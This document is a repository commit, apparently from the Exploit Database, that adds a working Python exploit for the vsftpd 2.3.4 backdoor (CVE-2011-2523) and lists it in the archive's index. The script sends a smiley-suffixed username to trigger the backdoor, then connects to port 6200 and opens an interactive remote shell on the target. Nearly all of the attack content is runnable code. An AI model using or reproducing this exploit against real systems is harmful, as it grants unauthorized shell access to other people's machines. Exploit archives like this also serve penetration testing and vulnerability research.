DB: 2021-04-13
1 changes to exploits/shellcodes vsftpd 2.3.4 - Backdoor Command Execution
This commit is contained in:
Offensive Security
parent
80c35fa864
commit
372d2afce7
2 changed files with 41 additions and 0 deletions
40
exploits/unix/remote/49757.py
Executable file
40
exploits/unix/remote/49757.py
Executable file
|
|
@ -0,0 +1,40 @@
|
|||
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
|
||||
# Date: 9-04-2021
|
||||
# Exploit Author: HerculesRD
|
||||
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
|
||||
# Version: vsftpd 2.3.4
|
||||
# Tested on: debian
|
||||
# CVE : CVE-2011-2523
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
from telnetlib import Telnet
|
||||
import argparse
|
||||
from signal import signal, SIGINT
|
||||
from sys import exit
|
||||
|
||||
def handler(signal_received, frame):
|
||||
# Handle any cleanup here
|
||||
print(' [+]Exiting...')
|
||||
exit(0)
|
||||
|
||||
signal(SIGINT, handler)
|
||||
parser=argparse.ArgumentParser()
|
||||
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
|
||||
args = parser.parse_args()
|
||||
host = args.host
|
||||
portFTP = 21 #if necessary edit this line
|
||||
|
||||
user="USER nergal:)"
|
||||
password="PASS pass"
|
||||
|
||||
tn=Telnet(host, portFTP)
|
||||
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
|
||||
tn.write(user.encode('ascii') + b"\n")
|
||||
tn.read_until(b"password.") #if necessary, edit this line
|
||||
tn.write(password.encode('ascii') + b"\n")
|
||||
|
||||
tn2=Telnet(host, 6200)
|
||||
print('Success, shell opened')
|
||||
print('Send `exit` to quit shell')
|
||||
tn2.interact()
|
||||
|
|
@ -18439,6 +18439,7 @@ id,file,description,date,author,type,platform,port
|
|||
49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
|
||||
49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
|
||||
49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux,
|
||||
49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue